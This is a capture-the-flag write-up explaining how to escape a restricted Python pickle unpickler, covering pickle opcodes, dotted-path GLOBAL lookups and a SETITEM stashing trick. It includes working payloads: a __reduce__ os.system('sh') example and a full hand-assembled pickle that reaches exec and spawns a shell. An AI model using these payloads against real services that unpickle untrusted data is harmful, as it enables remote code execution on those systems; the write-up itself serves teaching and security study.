Now that kmh is gone, clam’s been going through pickle withdrawal. To help him cope, he wrote his own pickle pyjail. It’s nothing like kmh’s, but maybe it’s enough.
Language jails are rapidly becoming one of my CTF areas of expertise. Not sure how I feel about that.
#!/usr/local/bin/python3
import pickle
import io
import sys

module = type(__builtins__)
empty = module("empty")
empty.empty = empty
sys.modules["empty"] = empty

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "empty" and name.count(".") <= 1:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("e-legal")

lepickle = bytes.fromhex(input("Enter hex-encoded pickle: "))
if len(lepickle) > 400:
    print("your pickle is too large for my taste >:(")
else:
    SafeUnpickler(io.BytesIO(lepickle)).load()
pickle is a Python object serialization format. As the docs page loudly proclaims, it is not secure. Roughly the simplest possible code to pop a shell (adapted from David Hamann, who constructs a more realistic RCE) looks like:
import os
import pickle

class Exploit:
    def __reduce__(self): return os.system, ("sh",)

pickle.loads(pickle.dumps(Exploit()))
At a high level, the pickle format is a stack-based mini-language. It’s not much of a language in and of itself: it has no control flow whatsoever and just executes opcodes from start to end. (Each opcode is one byte and is followed by zero or more arguments, whose format depends on the opcode. Each argument is either a fixed number of bytes or an arbitrary number of bytes up to the next newline.) But, crucially, the pickle language has opcodes GLOBAL, which can look up any global, and REDUCE, which can call any callable Python object. Using these two opcodes, you can call just about any Python built-in function with any conceivable argument, for example os.system with a command to pop a shell. This is why pickle is completely insecure by default.
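As a harmless illustration of those two opcodes, here is a minimal hand-assembled pickle that uses GLOBAL to fetch builtins.len and REDUCE to call it. The payload and the choice of len are my own example rather than anything from the challenge; the opcode constants come straight from the pickle module.

```python
import pickle

# Hand-assembled pickle: look up builtins.len, then call it on ("hello",).
payload = (
    pickle.GLOBAL + b"builtins\nlen\n"   # push the callable
    + pickle.UNICODE + b"hello\n"        # push the string "hello"
    + pickle.TUPLE1                      # wrap it into the argument tuple ("hello",)
    + pickle.REDUCE                      # call len("hello") and push the result
    + pickle.STOP                        # return the top of the stack
)

result = pickle.loads(payload)
print(result)
```

Swapping len for os.system and the string for a shell command is all it takes to turn this into the shell-popping pickle above.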
However, the behavior of opcode GLOBAL above is determined by Unpickler.find_class, which can be overridden to restrict unpickling. DiceCTF 2022 actually had a pickle challenge with the most restricted unpickler imaginable:
class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"HACKING DETECTED")
I never got around to writing that challenge up (maybe one day…), but I believe it was not intended to allow or require arbitrary code execution.
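To make the effect of such an override concrete, here is a small sketch of my own (the class name NoGlobalsUnpickler and the helper restricted_loads are hypothetical). It shows that plain data still loads, while anything that needs a global lookup is rejected.

```python
import io
import pickle

class NoGlobalsUnpickler(pickle.Unpickler):
    """Hypothetical stand-in for a maximally restricted unpickler."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError("HACKING DETECTED")

def restricted_loads(data: bytes):
    return NoGlobalsUnpickler(io.BytesIO(data)).load()

# Plain containers and scalars never touch find_class, so they still load.
plain = restricted_loads(pickle.dumps({"a": [1, 2, 3]}))

# Pickling a function by reference emits a global lookup, which is rejected.
try:
    restricted_loads(pickle.dumps(len))
    blocked = False
except pickle.UnpicklingError:
    blocked = True

print(plain, blocked)
```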
Well, in this challenge, find_class is still pretty restricted. We are only allowed to access properties of the empty module, and if we copy the bit of code that creates empty into a REPL to investigate, it doesn’t seem like there are that many:
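For reference, this is roughly what that check looks like. I use types.ModuleType here, which is the same class as type(__builtins__) when the challenge runs as a script; the exact set of dunder attributes may vary a little between Python versions.

```python
import types

# Recreate the challenge's module object.
empty = types.ModuleType("empty")
empty.empty = empty

# Only the default module dunders plus the self-reference live in its namespace.
names = sorted(vars(empty))
print(names)
```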
But this is misleading; empty has a few properties that every Python object does by dint of inheritance, which are the same properties we use in the standard jailbreaks for eval(..., {"__builtins__": {}}). For example:
>>> empty.__class__
<class 'module'>
>>> empty.__class__.__base__
<class 'object'>
>>> empty.__class__.__base__.__subclasses__()
[<class 'type'>, ... (a lot of subclasses I will omit here)]
To have a target to aim for, I’ll just grab the headlining quote in Finding Python3 built-ins:
If we get that far, we’re home free: we can grab exec or eval, or __import__ the os module, or pull off many other kinds of mischief.
Now, the filtered list comprehension is probably out of our reach to express in pickle code, so we’ll just try to get our pickle to do the following (135 is the index of Sized on the server’s list of __subclasses__, which I found by looking locally and then just trying nearby numbers against the server):
empty.__class__.__base__.__subclasses__()[135].__len__.__globals__['__builtins__']
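The local lookup for that index can be sketched as follows. The helper name find_sized_index is my own, and the number it prints depends on the interpreter version and on what has been imported, so treat it only as a starting guess for the remote value.

```python
import collections.abc  # normally already loaded at startup; imported here to be sure

def find_sized_index():
    """Return the position of collections.abc.Sized among object's subclasses."""
    for index, cls in enumerate(object.__subclasses__()):
        if cls.__name__ == "Sized":
            return index
    raise LookupError("Sized is not loaded in this interpreter")

index = find_sized_index()
sized = object.__subclasses__()[index]

# Sized.__len__ is a plain Python function, so it carries __globals__.
builtins_ns = sized.__len__.__globals__["__builtins__"]
# __builtins__ may be a dict or a module depending on context; normalize to a dict.
if not isinstance(builtins_ns, dict):
    builtins_ns = vars(builtins_ns)

print(index, "exec" in builtins_ns)
```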
This is still a little trickier than it sounds. Some resources like “Can I safely unpickle untrusted data?” make it sound like we can grab attributes willy-nilly, but getattr is not actually something we have available as a native pickle opcode (without literally grabbing the getattr function from GLOBAL, which is blocked by the overridden find_class). Instead, pickle just has opcodes for setattr and setitem. From the design standpoint of pickle, this makes sense since opcodes are meant to help you construct data, not access it; you shouldn’t need to get attributes of the data you constructed since you probably also put it there. But it makes our job a little more annoying.
The key insight that allows us to get over this hurdle is that the GLOBAL opcode uses getattr internally. What’s more, from pickle protocol 4 onward, GLOBAL supports dotted paths (which is why the challenge checks name.count(".")): calling GLOBAL with foo and "bar.baz" as arguments will get you foo.bar.baz. The challenge tries to limit how deep we can reach with the check that name.count(".") <= 1, which allows at most one dot per lookup, but because we can use the SETITEM opcode to set items onto empty.__dict__, we can stash intermediate results into empty and then go through empty to access their attributes with a dotted path. That is, given some value foo that we want to get the bar attribute of, we could write pickle opcodes that roughly do the following:
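Here is a minimal, harmless sketch of that stash-and-reload trick against a local copy of the challenge’s unpickler. The payload is my own illustration: it stores object under the hypothetical key a and then reads a.__name__ through a single-dot path.

```python
import io
import pickle
import sys
import types

# Local copy of the challenge setup (types.ModuleType stands in for type(__builtins__)).
empty = types.ModuleType("empty")
empty.empty = empty
sys.modules["empty"] = empty

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "empty" and name.count(".") <= 1:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("e-legal")

payload = (
    pickle.PROTO + b"\x04"
    + pickle.GLOBAL + b"empty\n__dict__\n"            # push empty.__dict__
    + pickle.UNICODE + b"a\n"                         # key: "a"
    + pickle.GLOBAL + b"empty\n__class__.__base__\n"  # value: object (one dot)
    + pickle.SETITEM                                  # empty.__dict__["a"] = object
    + pickle.POP                                      # discard the dict
    + pickle.GLOBAL + b"empty\na.__name__\n"          # empty.a.__name__ (one dot again)
    + pickle.STOP                                     # return the looked-up value
)

result = SafeUnpickler(io.BytesIO(payload)).load()
print(result)
```

Each GLOBAL stays within the one-dot limit, yet the second lookup effectively reaches empty.__class__.__base__.__name__.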
(I got stuck getting this to work for a while because I didn’t realize that this requires protocol version 4+, and that that’s still something you need to express in the pickle code. The documentation didn’t help — the pickletools source code mentions in one comment, “However, a pickle does not contain its version number embedded within it.” Eventually I figured this out by manually pickling something on a dotted path and disassembling the pickle.)
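The effect of the protocol byte is easy to reproduce locally. In this sketch (my own example, using os.path.join as a harmless dotted target) the same GLOBAL opcode fails without a PROTO prefix and succeeds with one.

```python
import os
import pickle

# GLOBAL with module "os" and the dotted name "path.join".
dotted_global = pickle.GLOBAL + b"os\npath.join\n" + pickle.STOP

# Without a PROTO opcode the unpickler assumes protocol 0 and does a single
# getattr(os, "path.join"), which fails.
try:
    pickle.loads(dotted_global, fix_imports=False)
    failed_without_proto = False
except (AttributeError, pickle.UnpicklingError):
    failed_without_proto = True

# With PROTO 4 the name is split on dots and resolved one attribute at a time.
resolved = pickle.loads(pickle.PROTO + b"\x04" + dotted_global, fix_imports=False)

print(failed_without_proto, resolved is os.path.join)
```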
To put together the full exploit, we just need to look up the opcodes we need and concatenate them together with the desired arguments. Each opcode is available as a constant from the pickle module, so we can write pretty literate code. The opcodes we use below are:
- PROTO, which takes a byte as an argument and indicates that the pickle has that protocol version
- GLOBAL, which takes two newline-delimited strings
- UNICODE, which takes a newline-delimited string and pushes it onto the stack
- SETITEM, which pops c, b, a from the stack, sets a[b] = c, and pushes a back
- EMPTY_TUPLE, which pushes a length-0 tuple
- REDUCE, which pops a tuple of arguments and a function from the stack, calls the function with the arguments, and pushes the result back onto the stack
- BININT1, which takes a byte as an argument and pushes it as an integer
- TUPLE1, which constructs a length-1 tuple from the top of the stack
- POP, which pops an element off the stack and discards it (not really necessary)
- STOP, which concludes the program (not really necessary)
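Since each of these constants is just a one-byte bytes object, a small pickle can be assembled by concatenation and checked with pickletools. A tiny sketch of my own, unrelated to the exploit itself, that builds the tuple (135,):

```python
import io
import pickle
import pickletools

# BININT1 pushes the integer 135, TUPLE1 wraps it, STOP returns it.
snippet = (
    pickle.PROTO + b"\x04"
    + pickle.BININT1 + bytes([135])
    + pickle.TUPLE1
    + pickle.STOP
)

value = pickle.loads(snippet)

# Disassemble into a string buffer to inspect the opcode stream.
listing = io.StringIO()
pickletools.dis(snippet, out=listing)

print(value)
print(listing.getvalue())
```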
Here’s my full exploit:
import pickle

body = (
    # Set the protocol version so that dotted paths are allowed
    pickle.PROTO + b'\x04' +

    # Push empty.__dict__. This will stay on the stack until the end.
    # We will call SETITEM on it.
    pickle.GLOBAL + b'empty\n__dict__\n' +

    # empty.a = empty.__class__.__base__ = object
    pickle.UNICODE + b'a\n' +
    pickle.GLOBAL + b'empty\n__class__.__base__\n' +
    pickle.SETITEM +

    # empty.b = empty.a.__subclasses__() = object.__subclasses__()
    pickle.UNICODE + b'b\n' +
    pickle.GLOBAL + b'empty\na.__subclasses__\n' +
    pickle.EMPTY_TUPLE +
    pickle.REDUCE +
    pickle.SETITEM +

    # empty.c = empty.b[135] = Sized
    pickle.UNICODE + b'c\n' +
    pickle.GLOBAL + b'empty\nb.__getitem__\n' +
    # 135 was the value that worked against the remote server, but is not by
    # any means constant between Python versions. I ran the snippet earlier to
    # get the value on my versions of Python and then tweaked it in this
    # exploit until it worked. Wrong values will just say "Cannot get
    # attribute".
    pickle.BININT1 + bytes([135]) +
    pickle.TUPLE1 +
    pickle.REDUCE +
    pickle.SETITEM +

    # empty.d = empty.c.__len__
    pickle.UNICODE + b'd\n' +
    pickle.GLOBAL + b'empty\nc.__len__\n' +
    pickle.SETITEM +

    # empty.e = empty.d.__globals__
    pickle.UNICODE + b'e\n' +
    pickle.GLOBAL + b'empty\nd.__globals__\n' +
    pickle.SETITEM +

    # empty.f = empty.e.__getitem__("__builtins__") = empty.e["__builtins__"]
    pickle.UNICODE + b'f\n' +
    pickle.GLOBAL + b'empty\ne.__getitem__\n' +
    pickle.UNICODE + b'__builtins__\n' +
    pickle.TUPLE1 +
    pickle.REDUCE +
    pickle.SETITEM +

    # we're ready for the finale; pop empty.__dict__
    # (not that we really need to)
    pickle.POP +

    # pop a shell:
    # empty.f.__getitem__("exec")('__import__("os").system("sh")')
    pickle.GLOBAL + b'empty\nf.__getitem__\n' +
    pickle.UNICODE + b'exec\n' +
    pickle.TUPLE1 +
    pickle.REDUCE +
    pickle.UNICODE + b'__import__("os").system("sh")\n' +
    pickle.TUPLE1 +
    pickle.REDUCE +

    # we don't really need this either
    pickle.STOP
)

# pickle.loads(body)
# pickletools.dis(body)
print(body.hex())
The hexed exploit is:
The bytestring is:
Once we pop a shell, we can cd / and cat flag.txt and we’re done!
actf{__i_miss_kmh11_pyjails__}